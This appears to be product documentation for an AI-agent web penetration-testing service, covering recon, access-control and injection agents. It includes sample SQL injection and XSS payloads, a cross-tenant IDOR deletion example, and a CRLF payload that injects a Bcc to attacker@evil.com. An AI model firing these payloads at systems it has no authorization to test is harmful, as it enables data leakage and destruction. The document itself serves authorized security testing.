Web Testing Agents

Our web testing agents specialize in finding vulnerabilities in websites and web applications. Each agent focuses on specific vulnerability categories from the OWASP Top 10.

Agent Overview

Recon Agent

The Reconnaissance Agent is the foundation of every pentest. It maps your application to enable effective testing.

What It Does

• Endpoint Discovery - Finds all accessible pages and routes
• Technology Detection - Identifies frameworks, libraries, versions
• Authentication Mapping - Understands login flows and session handling
• Input Identification - Locates forms, parameters, and entry points
• Architecture Understanding - Recognizes admin areas, user sections, APIs

How It Works

The Recon Agent takes your application URL and produces a comprehensive Application Map:

• Endpoints — All discovered pages and routes (typically 20-100+)
• Technologies — Frameworks, libraries, and versions detected
• Authentication flows — Login mechanisms and session handling
• Forms and parameters — All user input points
• Testing plan — Prioritized targets for other agents

Output

The Recon Agent produces a comprehensive map used by all other agents:

• List of endpoints to test
• Technology-specific considerations
• Authentication tokens and flows
• Priority targets based on risk

Access Control Agent

Tests for authorization vulnerabilities—the #1 most common web application security risk.

What It Tests

OWASP A01 - Broken Access Control (34% of applications)

Testing Methodology

1. Identify Object References - Find IDs, UUIDs, and other references
2. Baseline Collection - Document legitimate access patterns
3. Cross-User Testing - Attempt access with different credentials
4. Privilege Testing - Try escalating to higher permission levels
5. Authorization Bypass - Test various bypass techniques

Example Finding

❌ Critical: Unauthorized Cross-Organization Domain Deletion (IDOR)

Endpoint: DELETE /api/domains/:id
Parameter: id
CWE: CWE-639 (Authorization Bypass Through User-Controlled Key)
OWASP: A01:2021-Broken Access Control

Issue: The DELETE endpoint does not verify the authenticated user
       owns the domain or belongs to the same organization.

Evidence - Authorization Comparison:
-  GET /api/domains/:id  → 403 Forbidden (Protected ✓)
-  DELETE /api/domains/:id → 200 OK (VULNERABLE ✗)

Exploitation Proof:
- Attacker: bob@acme.com (Org: ACME Corp)
- Victim: admin@techstart.com (Org: TechStart Inc)
- Result: Attacker successfully deleted victim's domain
- Verification: GET by victim returned {"error":"Domain not found"}

Impact:
- Multi-tenant isolation breach
- Cross-organization data deletion
- Service disruption for victims
- Compliance violations (GDPR/CCPA)

Injection Agent

Tests for injection vulnerabilities—malicious data sent to interpreters.

What It Tests

OWASP A03 - Injection (18% of applications)

Testing Methodology

For each input parameter discovered by Recon:

1. Identify injection points - Forms, URL params, headers, JSON
2. Determine context - SQL, HTML, OS command, template
3. Send test payloads - Technology-appropriate inputs
4. Analyze responses - Errors, behavior changes, timing
5. Validate findings - Confirm exploitability

SQL Injection Testing

Input: search?q=test

Test payloads:
- test'           → SQL error indicates vulnerability
- test' OR '1'='1 → Behavior change indicates vulnerability
- test'; WAITFOR DELAY '0:0:5'-- → Time delay indicates blind SQLi

XSS Testing

Input: comment field

Test payloads (context-aware):
- HTML: <script>alert(1)</script>
- Attribute: " onclick="alert(1)"
- JavaScript: ';alert(1)//

Example Finding

❌ High: CRLF Injection Enables Email Header Manipulation

Endpoint: POST /api/emails
Parameter: subject
CWE: CWE-93 (CRLF Injection)
OWASP: A03:2021-Injection

Issue: The email subject field accepts CRLF characters (\r\n),
       allowing injection of arbitrary email headers.

Payload:
  subject: "Confidential\r\nBcc: attacker@evil.com\r\nReply-To: phishing@evil.com"

Injected Headers Confirmed:
- Bcc: attacker@evil.com (blind copy to attacker)
- Reply-To: phishing@evil.com (redirects replies)
- X-Priority: 1 (marks as urgent)
- Content-Type: text/html; charset=UTF-7

Response:
  {"id":"438356f2-...", "subject":"Confidential\r\nBcc: attacker@evil.com...", "status":"sent"}

Persistence: CRLF characters stored in database and returned in GET responses

Impact:
- Leak confidential emails via Bcc injection
- Phishing attacks via Reply-To manipulation
- Bypass email security filters
- Affects all users sending through the platform

Parallel Execution

After Recon completes, specialized agents run simultaneously on different endpoint groups:

All findings then flow into the Consolidation phase for deduplication and validation.

Findings Consolidation

After all agents complete:

1. Deduplication - Same vulnerability found by multiple agents? Merged.
2. Validation - Each finding confirmed for accuracy
3. Severity Assessment - Real-world risk evaluated
4. Remediation - Fix guidance tailored to your stack

Next Steps

• Learn about API Agents
• Learn about Platform Agents
• Run your first pentest

Last updated: December 8, 2025